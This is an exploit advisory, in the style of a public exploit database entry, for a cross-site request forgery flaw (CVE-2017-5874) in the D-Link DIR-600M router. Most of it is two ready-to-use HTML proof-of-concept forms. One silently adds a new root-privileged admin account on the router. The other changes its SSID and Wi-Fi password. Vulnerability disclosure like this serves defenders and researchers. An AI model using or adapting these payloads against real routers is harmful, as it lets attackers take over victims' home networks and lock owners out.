87 lines
No EOL
3.1 KiB
HTML
87 lines
No EOL
3.1 KiB
HTML
# Exploit Title:D-link wireless router DIR-600M – Cross-Site Request Forgery (CSRF) vulnerability
|
||
# Google Dork:N/A
|
||
# Date: 07/02/2017
|
||
# Exploit Author:Ajay S. Kulal (www.twitter.com/ajay_kulal)
|
||
# Vendor Homepage:dlink.com
|
||
# Software Link:N/A
|
||
# Version:Hardware version: C1
|
||
Firmware version: 3.03
|
||
# Tested on:All Platforms
|
||
# CVE :CVE-2017-5874
|
||
|
||
Abstract:
|
||
=======
|
||
|
||
Cross-Site Request Forgery (CSRF) vulnerability in the DIR-600M wireless router enables an attacker
|
||
to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
|
||
|
||
|
||
Exploitation-Technique:
|
||
===================
|
||
Remote
|
||
|
||
Severity Rating:
|
||
===================
|
||
|
||
7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)
|
||
|
||
Details:
|
||
=======
|
||
An attacker who lures a DIR-600M authenticated user to browse a malicious website
|
||
can exploit cross site request forgery (CSRF) to add new admin, change wifi password and to change other network settings.
|
||
|
||
Proof Of Concept code:
|
||
====================
|
||
|
||
1. Add new user with root access
|
||
|
||
<html>
|
||
<!-- CSRF PoC - by Ajay Kulal -->
|
||
<body>
|
||
<form action="http://192.168.0.1/form2userconfig.cgi" method="POST">
|
||
<input type="hidden" name="username" value="AK" />
|
||
<input type="hidden" name="privilege" value="2" />
|
||
<input type="hidden" name="newpass" value="dolphin" />
|
||
<input type="hidden" name="confpass" value="dolphin" />
|
||
<input type="hidden" name="adduser" value="Add" />
|
||
<input type="hidden" name="hiddenpass" value="" />
|
||
<input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
|
||
<input type="submit" value="Submit request" />
|
||
</form>
|
||
</body>
|
||
</html>
|
||
|
||
|
||
|
||
|
||
2. changing wireless password
|
||
|
||
<html>
|
||
<!-- CSRF PoC - by Ajay Kulal -->
|
||
<body>
|
||
<form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">
|
||
<input type="hidden" name="domain" value="1" />
|
||
<input type="hidden" name="hiddenSSID" value="on" />
|
||
<input type="hidden" name="ssid" value="Dravidian" />
|
||
<input type="hidden" name="band" value="10" />
|
||
<input type="hidden" name="chan" value="0" />
|
||
<input type="hidden" name="chanwid" value="1" />
|
||
<input type="hidden" name="txRate" value="0" />
|
||
<input type="hidden" name="method_cur" value="0" />
|
||
<input type="hidden" name="method" value="2" />
|
||
<input type="hidden" name="authType" value="2" />
|
||
<input type="hidden" name="length" value="1" />
|
||
<input type="hidden" name="format" value="2" />
|
||
<input type="hidden" name="defaultTxKeyId" value="1" />
|
||
<input type="hidden" name="key1" value="0000000000" />
|
||
<input type="hidden" name="pskFormat" value="0" />
|
||
<input type="hidden" name="pskValue" value="password123" />
|
||
<input type="hidden" name="checkWPS2" value="1" />
|
||
<input type="hidden" name="save" value="Apply" />
|
||
<input type="hidden" name="basicrates" value="15" />
|
||
<input type="hidden" name="operrates" value="4095" />
|
||
<input type="hidden" name="submit.htm?wlan_basic.htm" value="Send" />
|
||
<input type="submit" value="Submit request" />
|
||
</form>
|
||
</body>
|
||
</html> |